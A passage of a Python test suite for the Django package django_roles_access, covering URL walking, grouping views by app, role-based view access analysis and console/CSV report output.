'fake-callback', 'fake-namespace:fake-view-name', 'fake-app-name'
)
]
resolver = MockResolverDjango2()
result = walk_site_url([MockPatternDjango2(), resolver])
self.assertEqual(result, expected_result)
def test_param_list_with_pattern_and_nested_resolver_django_2(self):
expected_result = [
('fake-pattern/', 'fake-callback', 'fake-view-name', None),
('fake-nested-resolver/fake-resolver/fake-pattern/',
'fake-callback', 'nested-namespace:fake-namespace:fake-view-name',
'fake-app-name'
)
]
result = walk_site_url([MockPatternDjango2(),
MockResolverDjangoNested()])
self.assertEqual(result, expected_result)
def test_param_list_with_resolver_get_app_name_and_view_name_django_1(self):
expected_result = [
('fake-resolver/fake-regex-pattern/',
'fake-callback', 'fake-namespace:fake-view-name', 'fake-app-name'
),
('fake-nested-resolver/fake-resolver/fake-regex-pattern/',
'fake-callback', 'nested-namespace:fake-namespace:fake-view-name',
'fake-app-name'
)
]
result = walk_site_url([MockResolver(), MockResolverNested()])
self.assertEqual(result, expected_result)
def test_param_list_with_resolver_get_app_name_and_view_name_django_2(self):
expected_result = [
('fake-resolver/fake-pattern/',
'fake-callback', 'fake-namespace:fake-view-name', 'fake-app-name'
),
('fake-nested-resolver/fake-resolver/fake-pattern/',
'fake-callback', 'nested-namespace:fake-namespace:fake-view-name',
'fake-app-name'
)
]
resolver = MockResolverDjango2()
nested_resolver = MockResolverDjangoNested()
result = walk_site_url([resolver, nested_resolver])
self.assertEqual(result, expected_result)
def test_when_url_namespace_is_None(self):
expected_result = [
('fake-resolver/fake-resolver/fake-pattern/',
'fake-callback', 'fake-view-none', None
)
]
resolver = MockResolverDjango2None2()
result = walk_site_url([resolver])
self.assertEqual(result, expected_result)
# def test_when_view_name_is_None(self):
# expected_result = [
# ('fake-resolver/fake-pattern/',
# 'fake-callback', 'fake-view-name', None
# )
# ]
# resolver = MockResolverDjango2None2()
# result = walk_site_url([resolver])
# print(result)
# self.assertEqual(result, expected_result)
class IntegratedTestWalkSiteURL(TestCase):
def setUp(self):
self.url = import_module(settings.ROOT_URLCONF).urlpatterns
def test_found_direct_access_view(self):
expected_result = ('direct_access_view/',
views.protected_view_by_role,
'direct_access_view', None)
result = walk_site_url(self.url)
self.assertIn(expected_result, result)
def test_found_included_view_without_namespace(self):
expected_result = ('role-included[135]/view_by_role/',
views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
'django_roles_access')
result = walk_site_url(self.url)
self.assertIn(expected_result, result)
def test_found_included_view_with_namespace(self):
expected_result = ('role-included2/view_by_role/',
views.protected_view_by_role,
'app-ns2:view_protected_by_role',
'django_roles_access')
result = walk_site_url(self.url)
self.assertIn(expected_result, result)
def test_found_nested_access_view(self):
expected_result = ('nest1/nest2/view_by_role/',
views.protected_view_by_role,
'nest1_namespace:nest2_namespace:view_'
'protected_by_role',
'roles-app-name')
result = walk_site_url(self.url)
self.assertIn(expected_result, result)
class UnitTestGetViewsByApp(UnitTestCase):
"""
get_views_by_app receive the result of walk_site_url and is required to
return a dictionary with keys been installed applications.
"""
def setUp(self):
self.data = [('a', 'b', 'c', 'fake-app-1')]
@patch('django_roles_access.utils.settings')
def test_returns_a_dictionary(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1', 'fake-app-2']
result = get_views_by_app(self.data)
self.assertIsInstance(result, dict)
@patch('django_roles_access.utils.settings')
def test_returns_a_dictionary_with_all_installed_apps(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1', 'fake-app-2']
result = get_views_by_app(self.data)
assert 'fake-app-1' in result
assert 'fake-app-2' in result
@patch('django_roles_access.utils.settings')
def test_values_of_returned_dictionary_keys_are_lists(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1', 'fake-app-2']
result = get_views_by_app(self.data)
self.assertIsInstance(result['fake-app-1'], list)
self.assertIsInstance(result['fake-app-2'], list)
@patch('django_roles_access.utils.settings')
def test_receive_list_of_tuples_with_4_element(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1']
result = get_views_by_app(self.data)
assert 'fake-app-1' in result
@patch('django_roles_access.utils.settings')
def test_raise_type_error_if_receive_list_of_tuples_with_3_element(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1']
data = [('a', 'b', 'c')]
with self.assertRaises(TypeError):
get_views_by_app(data)
@patch('django_roles_access.utils.settings')
def test_raise_type_error_if_receive_list_of_tuples_with_5_element(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1']
data = [('a', 'b', 'c', 'd', 'e')]
with self.assertRaises(TypeError):
get_views_by_app(data)
@patch('django_roles_access.utils.settings')
def test_received_data_is_ordered_and_returned_by_application(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1', 'fake-app-2', None]
data = [('a', 'b', 'c', 'fake-app-1'), ('1', '2', '3', 'fake-app-2'),
('a1', 'b2', 'c3', None)]
expected_result = [('a', 'b', 'c')]
result = get_views_by_app(data)
self.assertEqual(expected_result, result['fake-app-1'])
@patch('django_roles_access.utils.settings')
def test_can_work_with_no_declared_application_name(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1', 'fake-app-2', None]
data = [('a', 'b', 'c', 'fake-app-1'), ('1', '2', '3', 'fake-app-2'),
('a1', 'b2', 'c3', None)]
expected_result = [('a1', 'b2', 'c3')]
result = get_views_by_app(data)
self.assertEqual(expected_result, result[APP_NAME_FOR_NONE])
@patch('django_roles_access.utils.settings')
def test_if_application_is_not_in_installed_apps_will_not_be_in_dict(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1', 'fake-app-2', None]
result = get_views_by_app(self.data)
assert 'fake-app-3' not in result
class IntegratedTestGetViewsByApp(TestCase):
def setUp(self):
self.url = import_module(settings.ROOT_URLCONF).urlpatterns
def test_not_declared_app_are_recognized_as_undefined_app(self):
expected_result = ('direct_access_view/',
views.protected_view_by_role,
'direct_access_view')
result = get_views_by_app(walk_site_url(self.url))
self.assertIn(expected_result, result[APP_NAME_FOR_NONE])
def test_views_without_namespace_are_added_with_app_name_in_view_name(self):
expected_result = ('role-included[135]/view_by_role/',
views.protected_view_by_role,
'django_roles_access:view_protected_by_role')
result = get_views_by_app(walk_site_url(self.url))
self.assertIn(expected_result, result['django_roles_access'])
def test_view_with_namespace_are_added_with_correct_app_name(self):
expected_result = ('role-included2/view_by_role/',
views.protected_view_by_role,
'app-ns2:view_protected_by_role')
result = get_views_by_app(walk_site_url(self.url))
self.assertIn(expected_result, result['django_roles_access'])
def test_nested_namespace_are_added_with_correct_app_name(self):
expected_result = ('nest1/nest2/view_by_role/',
views.protected_view_by_role,
'nest1_namespace:nest2_namespace:view_'
'protected_by_role')
result = get_views_by_app(walk_site_url(self.url))
self.assertIn(expected_result, result['roles-app-name'])
class TestGetViewAnalyzeReport(UnitTestCase):
def test_report_for_no_application_type(self):
expected = u'\t' + NONE_TYPE_DEFAULT
result = get_view_analyze_report(None)
self.assertEqual(result, expected)
def test_report_for_application_type_NOT_SECURED(self):
expected = u'\t' + NOT_SECURED_DEFAULT
result = get_view_analyze_report('NOT_SECURED')
self.assertEqual(result, expected)
self.assertEqual(result, expected)
def test_report_for_application_type_DISABLED(self):
expected = u'\t' + DISABLED_DEFAULT
result = get_view_analyze_report('DISABLED')
self.assertEqual(result, expected)
def test_report_for_application_type_SECURED(self):
expected = u'\t' + SECURED_DEFAULT
result = get_view_analyze_report('SECURED')
self.assertEqual(result, expected)
def test_report_for_application_type_PUBLIC(self):
expected = u'\t' + PUBLIC_DEFAULT
result = get_view_analyze_report('PUBLIC')
self.assertEqual(result, expected)
class TestCheckDjangoRolesIsUsed(UnitTestCase):
def test_detect_view_is_decorated(self):
@access_by_role
def function():
pass
self.assertTrue(check_django_roles_is_used(function))
def test_detect_view_is_not_decorated(self):
def function():
pass
self.assertFalse(check_django_roles_is_used(function()))
def test_detect_view_use_mixin(self):
class Aview(RolesMixin, TemplateView):
template_name = 'dummyTemplate.html'
self.assertTrue(check_django_roles_is_used(Aview))
def test_detect_view_not_use_mixin(self):
class Aview(TemplateView):
template_name = 'dummyTemplate.html'
self.assertFalse(check_django_roles_is_used(Aview))
@patch('django_roles_access.utils.ViewAccess')
class UnitTestAnalyzeByRoleAccess(UnitTestCase):
def test_detect_access_is_by_role(
self, mock_view_access
):
expected = u'ERROR: No roles configured to access de view.'
mock_view_access.type = 'br'
mock_view_access.roles.count.return_value = 0
result = analyze_by_role(mock_view_access)
self.assertEqual(result, expected)
def test_detect_access_is_not_by_role(
self, mock_view_access
):
expected = u''
mock_view_access.type = 'pu'
result = analyze_by_role(mock_view_access)
self.assertEqual(result, expected)
def test_detect_access_is_not_by_role_with_roles(
self, mock_view_access
):
expected = u'Roles with access: role-1, role-2'
mock_view_access.type = 'br'
role_1 = Mock()
role_1.name = u'role-1'
role_2 = Mock()
role_2.name = u'role-2'
mock_view_access.roles.all.return_value = [role_1, role_2]
result = analyze_by_role(mock_view_access)
self.assertEqual(result, expected)
def test_detect_access_is_not_by_role_without_roles(
self, mock_view_access
):
expected = u'ERROR: No roles configured to access de view.'
mock_view_access.type = 'br'
mock_view_access.roles.count.return_value = 0
result = analyze_by_role(mock_view_access)
self.assertEqual(result, expected)
class IntegratedTestAnalyzeByRoleAccess(TestCase):
def test_detect_access_is_by_role(self):
expected = u'ERROR: No roles configured to access de view.'
view_access = ViewAccess.objects.create(view='any-name', type='br')
result = analyze_by_role(view_access)
self.assertEqual(result, expected)
def test_detect_access_is_not_by_role(self):
expected = u''
view_access = ViewAccess.objects.create(view='any-name', type='pu')
result = analyze_by_role(view_access)
self.assertEqual(result, expected)
def test_detect_access_is_by_role_with_roles(self):
expected = u'Roles with access: role-1, role-2'
view_access = ViewAccess.objects.create(view='any-name', type='br')
role_1, created = Group.objects.get_or_create(name='role-1')
role_2, created = Group.objects.get_or_create(name='role-2')
view_access.roles.add(role_1)
view_access.roles.add(role_2)
view_access.save()
result = analyze_by_role(view_access)
self.assertEqual(result, expected)
def test_detect_access_is_not_by_role_without_roles(self):
expected = u'ERROR: No roles configured to access de view.'
view_access = ViewAccess.objects.create(view='any-name', type='br')
result = analyze_by_role(view_access)
self.assertEqual(result, expected)
@patch('django_roles_access.utils.ViewAccess.objects')
class UnitTestViewAnalyzer(UnitTestCase):
def test_view_analyzer_return_a_report(
self, mock_objects
):
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
result = view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', 'fake-site-active')
try:
self.assertIsInstance(result, unicode)
except:
self.assertIsInstance(result, str)
def test_view_analyzer_search_view_access_for_the_view(
self, mock_objects
):
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', 'fake-site-active')
assert mock_objects.first.called
def test_view_analyzer_search_view_access_for_the_view_once(
self, mock_objects
):
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', 'fake-site-active')
self.assertEqual(mock_objects.filter.call_count, 1)
def test_view_analyzer_search_view_access_with_view_name(
self, mock_objects
):
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', 'fake-site-active')
mock_objects.filter.assert_called_once_with(view='fake-view-name')
def test_view_access_type_when_site_active_and_exists_view_access(
self, mock_objects
):
expected = u'View access is of type Public.'
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
result = view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', True)
self.assertEqual(result, expected)
@patch('django_roles_access.utils.analyze_by_role')
def test_view_access_type_by_role_call_analyze_by_role(
self, mock_analyze_by_role, mock_objects
):
view_access = Mock()
view_access.type = 'br'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', True)
assert mock_analyze_by_role.called
@patch('django_roles_access.utils.analyze_by_role')
def test_view_access_type_by_role_call_analyze_by_role_once(
self, mock_analyze_by_role, mock_objects
):
view_access = Mock()
view_access.type = 'br'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', True)
self.assertEqual(mock_analyze_by_role.call_count, 1)
@patch('django_roles_access.utils.analyze_by_role')
def test_view_access_type_by_role_call_analyze_by_role_with_view_access(
self, mock_analyze_by_role, mock_objects
):
view_access = Mock()
view_access.type = 'br'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', True)
mock_analyze_by_role.assert_called_once_with(view_access)
def test_no_view_access_object_for_the_view_and_site_active_no_app_type(
self, mock_objects
):
expected = u'\t' + NONE_TYPE_DEFAULT
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer(None, 'fake-callback',
'fake-view-name', True)
self.assertEqual(result, expected)
def test_no_view_access_object_and_site_active_app_type_NOT_SECURED(
self, mock_objects
):
expected = u'\t' + NOT_SECURED_DEFAULT
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer('NOT_SECURED', 'fake-callback',
'fake-view-name', True)
self.assertEqual(result, expected)
def test_no_view_access_object_and_site_active_app_type_DISABLED(
self, mock_objects
):
expected = u'\t' + DISABLED_DEFAULT
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer('DISABLED', 'fake-callback',
'fake-view-name', True)
self.assertEqual(result, expected)
def test_no_view_access_object_and_site_active_app_type_SECURED(
self, mock_objects
):
expected = u'\t' + SECURED_DEFAULT
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer('SECURED', 'fake-callback',
'fake-view-name', True)
self.assertEqual(result, expected)
def test_no_view_access_object_and_site_active_app_type_PUBLIC(
self, mock_objects
):
expected = u'\t' + PUBLIC_DEFAULT
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer('PUBLIC', 'fake-callback',
'fake-view-name', True)
self.assertEqual(result, expected)
def test_middleware_not_used_view_access_object_exist_and_dr_tools_used(
self, mock_objects
):
expected = u'View access is of type Public.'
@access_by_role
def function():
pass
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
result = view_access_analyzer('fake-app-type', function,
'fake-view-name', False)
self.assertEqual(result, expected)
def test_middleware_not_used_view_access_object_exist_and_dr_tools_not_used(
self, mock_objects
):
expected = u'ERROR: View access object exist for the view, but no '
expected += u'Django role access tool is used: neither decorator, '
expected += u'mixin, or middleware.'
def function():
pass
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
result = view_access_analyzer('fake-app-type', function,
'fake-view-name', False)
self.assertEqual(result, expected)
def test_middleware_not_used_dr_tools_are_used_no_view_access_object(
self, mock_objects
):
expected = u'\t' + PUBLIC_DEFAULT
@access_by_role
def function():
pass
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer('PUBLIC', function,
'fake-view-name', False)
self.assertEqual(result, expected)
def test_no_django_roles_tools_used_no_application_type(
self, mock_objects
):
expected = u'No Django roles access tool used. Access to view depends '
expected += u'on its implementation.'
def function():
pass
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer(None, function,
'fake-view-name', False)
self.assertEqual(result, expected)
def test_no_django_roles_tools_used_application_type(
self, mock_objects
):
expected = u'No Django roles access tool used. Access to view depends '
expected += u'on its implementation.'
def function():
pass
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer('Authorized', function,
'fake-view-name', False)
self.assertEqual(result, expected)
class IntegratedTestViewAnalyzezr(TestCase):
def test_with_middleware_SECURED_without_view_access_object(self):
expected = u'\t' + SECURED_DEFAULT
result = view_access_analyzer(
'SECURED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(expected, result)
def test_with_middleware_NOT_SECURED_with_view_access_object(self):
ViewAccess.objects.create(
view='django_roles_access:middleware_view_class',
type='br')
result = view_access_analyzer(
'NOT_SECURED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(result, u'\t' + NOT_SECURED_DEFAULT)
def test_with_middleware_DISABLED_with_view_access_object(self):
ViewAccess.objects.create(
view='django_roles_access:middleware_view_class',
type='pu')
result = view_access_analyzer(
'DISABLED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(result, u'\t' + DISABLED_DEFAULT)
def test_with_middleware_with_view_access_object(self):
expected = u'View access is of type By role.'
expected += u'ERROR: No roles configured to access de view.'
ViewAccess.objects.create(
view='django_roles_access:middleware_view_class',
type='br')
result = view_access_analyzer(
'SECURED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(result, expected)
def test_with_middleware_with_view_access_object_with_roles(self):
expected = u'View access is of type By role.'
expected += u'Roles with access: test1, test2'
g1, created = Group.objects.get_or_create(name='test1')
g2, created = Group.objects.get_or_create(name='test2')
view_access = ViewAccess.objects.create(
view='django_roles_access:middleware_view_class',
type='br')
view_access.roles.add(g1)
view_access.roles.add(g2)
view_access.save()
result = view_access_analyzer(
'SECURED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(result, expected)
def test_with_middleware_with_view_access_object_authorized(self):
expected = u'View access is of type Authorized.'
ViewAccess.objects.create(
view='django_roles_access:middleware_view_class',
type='au')
result = view_access_analyzer(
'SECURED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(result, expected)
def test_with_middleware_with_view_access_object_public(self):
expected = u'View access is of type Public.'
ViewAccess.objects.create(
view='django_roles_access:middleware_view_class',
type='pu')
result = view_access_analyzer(
'SECURED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(result, expected)
def test_without_middleware_with_view_access_object(self):
expected = u'View access is of type By role.'
expected += u'ERROR: No roles configured to access de view.'
ViewAccess.objects.create(
view='django_roles_access:view_protected_by_role',
type='br')
result = view_access_analyzer(
'SECURED', views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
False)
self.assertEqual(result, expected)
def test_without_middleware_with_view_access_object_with_roles(self):
expected = u'View access is of type By role.'
expected += u'Roles with access: test1, test2'
g1, created = Group.objects.get_or_create(name='test1')
g2, created = Group.objects.get_or_create(name='test2')
view_access = ViewAccess.objects.create(
view='django_roles_access:view_protected_by_role',
type='br')
view_access.roles.add(g1)
view_access.roles.add(g2)
view_access.save()
result = view_access_analyzer(
'SECURED', views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
False)
self.assertEqual(result, expected)
def test_without_middleware_with_view_access_object_authorized(self):
expected = u'View access is of type Authorized.'
ViewAccess.objects.create(
view='django_roles_access:view_protected_by_role',
type='au')
result = view_access_analyzer(
'SECURED', views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
False)
self.assertEqual(result, expected)
def test_without_middleware_with_view_access_object_public(self):
expected = u'View access is of type Public.'
ViewAccess.objects.create(
view='django_roles_access:view_protected_by_role',
type='pu')
result = view_access_analyzer(
'SECURED', views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
False)
self.assertEqual(result, expected)
def test_without_middleware_without_view_access_object_and_view_protected(
self
):
expected = u'\t' + SECURED_DEFAULT
result = view_access_analyzer(
'SECURED', views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
False)
self.assertEqual(result, expected)
def test_without_middleware_no_view_access_object_and_view_protected_without_app(
self
):
expected = u'\t' + NONE_TYPE_DEFAULT
result = view_access_analyzer(
None, views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
False)
self.assertEqual(result, expected)
def test_without_middleware_with_view_access_object_and_view_not_protected(
self
):
expected = u'ERROR: View access object exist for the view, '
expected += 'but no Django role access tool is used: neither '
expected += 'decorator, mixin, or middleware.'
ViewAccess.objects.create(
view='django_roles_access:middleware_view_func',
type='pu')
result = view_access_analyzer(
None, views.middleware_view,
'django_roles_access:middleware_view_func',
False)
self.assertEqual(result, expected)
class UnitTestOutputReport(UnitTestCase):
def setUp(self):
self.patch_mock_stdout = patch.object(BaseCommand(), 'style')
self.patch_mock_style = patch.object(BaseCommand(), 'stdout')
self.mock_stdout = self.patch_mock_stdout.start()
self.mock_style = self.patch_mock_style.start()
self._output = OutputReport(self.mock_stdout, self.mock_style)
def tearDown(self):
self.patch_mock_stdout.stop()
self.patch_mock_style.stop()
def test_initial_with_parameter(self):
assert self._output.stdout == self.mock_stdout
assert self._output.style == self.mock_style
def test_internal_attributes_are_initialize(self):
assert hasattr(self._output, '_row') and self._output._row == u''
assert hasattr(self._output, '_format') and self._output._format == \
'console'
def test_initial_without_parameter(self):
with self.assertRaises(TypeError) as e:
OutputReport()
def test_default_output_format_is_correct_type(self):
assert self._output._format == 'console'
def test_set_format(self):
self._output.set_format('csv')
assert self._output._format == 'csv'
def test_add_to_row(self):
self._output.add_to_row('text')
self._output.add_to_row('other')
self.assertIn('text', self._output._row)
self.assertIn('other', self._output._row)
def test_write_method_write_to_stdout(self):
self._output.write(u'some text')
assert self.mock_stdout.write.called
def test_write_method_use_stdout_write_once(self):
self._output.write(u'some text')
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_write_method_use_SUCCESS_style_for_styling_output(self):
self._output.write(u'some text')
self.mock_stdout.write.assert_called_once_with(
self.mock_style.SUCCESS())
def test_write_method_use_SUCCESS_style_for_output(self):
self._output.write(u'some text')
assert self.mock_style.SUCCESS.called
def test_write_method_use_style_with_received_argument(self):
self._output.write(u'some text')
self.mock_style.SUCCESS.assert_called_once_with(u'some text')
def test_console_format_write_correct_header_to_stdout_with_SUCCESS_style(
self
):
expected = u'Start checking views access.\n'
expected += u'Start gathering information.'
self._output.write_header()
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
@patch('django_roles_access.utils.timezone')
def test_cvs_format_write_correct_header(
self, mock_timezone
):
mock_timezone.now.return_value = 'fake-date'
self._output.set_format('csv')
self._output.write_header()
self.mock_style.SUCCESS.assert_called_once_with(u'Reported: fake-date')
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_console_format_write_correct_middleware_status_and_end_of_header(
self
):
expected = u'Django roles access middleware is active: False.\n'
self._output.write_middleware_status(False)
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_console_format_write_correct_end_of_header(
self
):
expected = u'Finish gathering information.'
self._output.write_end_of_head()
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_cvs_format_write_correct_correct_middleware_status(
self
):
expected = u'Django roles access middleware is active: False.\n'
self._output.set_format('csv')
self._output.write_middleware_status(False)
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_cvs_format_write_correct_csv_columns(
self
):
expected = u'App Name,Type,View Name,Url,Status,Status description'
self._output.set_format('csv')
self._output.write_end_of_head()
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_console_format_process_app_data_to_stdout_with_SUCCESS_style(self):
app_name = u'fake-app-name'
app_type = u'fake-app-type'
view_list = ['fake-view']
expected = u'\tAnalyzing: {}\n'.format(app_name)
expected += u'\t\t{} is {} type.'.format(app_name, app_type)
self._output.process_application_data(app_name, app_type, view_list)
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_console_format_process_app_data_without_type(self):
app_name = u'fake-app-name'
app_type = None
view_list = ['fake-view']
expected = u'\tAnalyzing: {}\n'.format(app_name)
expected += u'\t\t{} has no type.'.format(app_name)
self._output.process_application_data(app_name, app_type, view_list)
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_console_format_process_app_data_without_views(self):
app_name = u'fake-app-name'
app_type = u'fake-app-type'
view_list = []
expected = u'\tAnalyzing: {}\n'.format(app_name)
expected += u'\t\t{} is {} type.'.format(app_name, app_type)
expected += u'\t\t{} does not have configured views.'.format(app_name)
self._output.process_application_data(app_name, app_type, view_list)
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_cvs_format_process_application_data_to_string(self):
app_name = u'fake-app-name'
app_type = u'fake-app-type'
view_list = ['fake-view-list']
expected = u'{},{},'.format(app_name, app_type, view_list)
self._output.set_format('csv')
self._output.process_application_data(app_name, app_type, view_list)
self.assertEqual(expected, self._output._row)
def test_cvs_format_process_application_data_without_type_to_string(self):
app_name = u'fake-app-name'
app_type = None
view_list = ['fake-view-list']
expected = u'fake-app-name,no type,'.format(app_name)
self._output.set_format('csv')
self._output.process_application_data(app_name, app_type, view_list)
self.assertEqual(expected, self._output._row)
def test_cvs_format_process_application_data_without_views(self):
app_name = u'fake-app-name'
app_type = u'fake-app-type'
view_list = []
expected = u'fake-app-name,fake-app-type,,,,,'.format(app_name)
self._output.set_format('csv')
self._output.process_application_data(app_name, app_type, view_list)
self.assertEqual(expected, self._output._row)
def test_console_format_process_view_data_to_stdout_with_SUCCESS_style(
self
):
view_name = u'fake-view-name'
url = '/fake-url/'
expected = u'\n\t\tAnalysis for view: {}'.format(view_name)
expected += u'\n\t\tView url: {}'.format(url)
self._output.process_view_data(view_name, url)
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_cvs_format_process_view_data(self):
view_name = u'fake-view-name'
url = '/fake-url/'
expected = u'{},{}'.format(view_name, url)
self._output.set_format('csv')
self._output.process_view_data(view_name, url)
self.assertIn(expected, self._output._row)
# View_access_analyzer output.
def test_console_format_write_vaa_to_stdout(self):
self._output.write_view_access_analyzer(u'some text')
assert self.mock_stdout.write.called
def test_console_format_use_stdout_write_once_with_vaa(self):
self._output.write_view_access_analyzer(u'some text')
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_console_format_use_SUCCESS_style_for_styling_output_of_vaa(self):
self._output.write_view_access_analyzer(u'some text')
self.mock_stdout.write.assert_called_once_with(
self.mock_style.SUCCESS())
def test_console_format_use_SUCCESS_style_for_output_of_vaa(self):
self._output.write_view_access_analyzer(u'some text')
assert self.mock_style.SUCCESS.called
def test_console_format_use_style_with_vaa_result(self):
self._output.write_view_access_analyzer(u'some text')
self.mock_style.SUCCESS.assert_called_once_with(u'\t\tsome text')
def test_console_format_use_ERROR_style_for_output_if_error_in_vaa(self):
self._output.write_view_access_analyzer('ERROR: fake report')
assert self.mock_style.ERROR.called
def test_console_format_use_ERROR_style_with_the_error_in_vaa(self):
self._output.write_view_access_analyzer('ERROR: fake report')
self.mock_style.ERROR.assert_called_once_with('\t\t' +
'ERROR: fake report')
def test_console_format_use_WARNING_style_for_output_if_warning_in_vaa(self):
self._output.write_view_access_analyzer('WARNING: fake report')
assert self.mock_style.WARNING.called
def test_console_format_use_WARNING_style_with_the_warning_in_vaa(self):
self._output.write_view_access_analyzer('WARNING: fake report')
self.mock_style.WARNING.assert_called_once_with(
'\t\t' + 'WARNING: fake report')
def test_csv_format_write_view_access_analyzer_with_Normal_to_stdout(self):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
self._output._format = 'csv'
self._output.write_view_access_analyzer(u'fake-report')
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_csv_format_write_view_access_analyzer_with_Normal_to_style(self):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
expected = u'fake-app,fake-type,fake-view,fake-url,Normal,fake-report\n'
self._output._format = 'csv'
self._output.write_view_access_analyzer(u'fake-report')
self.mock_style.SUCCESS.assert_called_once_with(expected)
def test_csv_format_write_view_access_analyzer_with_WARNING_to_stdout(self):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
self._output._format = 'csv'
self._output.write_view_access_analyzer('WARNING: fake-report')
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_csv_format_write_view_access_analyzer_with_WARNING_with_style(
self
):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
expected = u'fake-app,fake-type,fake-view,fake-url,Warning,' \
u'fake-report\n'
self._output._format = 'csv'
self._output.write_view_access_analyzer('WARNING: fake-report')
self.mock_style.WARNING.assert_called_once_with(expected)
def test_csv_format_write_view_access_analyzer_with_ERROR_to_stdout(self):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
self._output._format = 'csv'
self._output.write_view_access_analyzer('ERROR: fake-report')
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_csv_format_write_view_access_analyzer_with_ERROR_with_style(self):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
expected = u'fake-app,fake-type,fake-view,fake-url,Error,fake-report\n'
self._output._format = 'csv'
self._output.write_view_access_analyzer('ERROR: fake-report')
self.mock_style.ERROR.assert_called_once_with(expected)
def test_csv_format_write_view_access_analyzer_reset_OutputFormater_row(
self
):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
self._output._format = 'csv'
self._output.write_view_access_analyzer('fake-report')
self.assertEqual(self._output._row, u'fake-app,fake-type,')
def test_console_format_close_application_data_to_stdout_with_SUCCESS_style(
self
):
